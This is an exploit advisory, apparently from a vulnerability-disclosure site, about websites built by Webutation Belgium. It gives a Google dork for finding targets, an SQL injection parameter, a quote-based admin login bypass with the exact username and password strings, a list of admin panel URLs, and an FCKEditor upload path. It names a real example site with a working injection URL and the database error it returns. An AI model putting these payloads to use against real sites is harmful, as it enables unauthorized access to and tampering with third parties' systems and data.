Copyright © 2011 - 2018 Webutation Belgium Multiple Vulnerabilities

2018.09.18
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

################################################################################################# # Exploit Title : Copyright © 2011 - 2018 Webutation Belgium Multiple Vulnerabilities # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 18/09/2018 # Vendor Homepage : webutation.net ~ webutation.org # Tested On : Windows # Category : WebApps # Exploit Risk : Medium # CWE : CWE-592 - [ Authentication Bypass Issues ] + CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Google Dork : intext:Copyright © 2011 - 2018 Webutation site:be © Webutation 2018 # SQL Injection Exploit => /activiteit.php?id=[SQL Inj] # Admin Panel Login Path => /admin/login.php # Admin Login Bypass Exploit : Username : '=''or' Password : '=''or' # Useable Admin Panel Control URL Links => /admin/ingelogged.php /admin/activiteiten.php /admin/info.php /admin/medewerkers.php /admin/leden.php /admin/gastenboek.php /admin/verslagen.php # FCKEditor Filemanager Exploit => TARGET/fckeditor/editor/filemanager/connectors/uploadtest.html TARGET/yourfilenamehere.txt ################################################################################################# # Example Site => tgeverke.be => [ Proof of Concept for Authentication Bypass ] => archive.is/OQ8GQ # Example Site for SQL Inj => tgeverke.be/activiteit.php?id=465%27 # SQL Database Error => FOUT1: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''465''' at line 1 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################

References:

https://www.cyberizm.org/cyberizm-copyright-%C2%A9-2011-2018-webutation-belgium-multiple-vuln.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top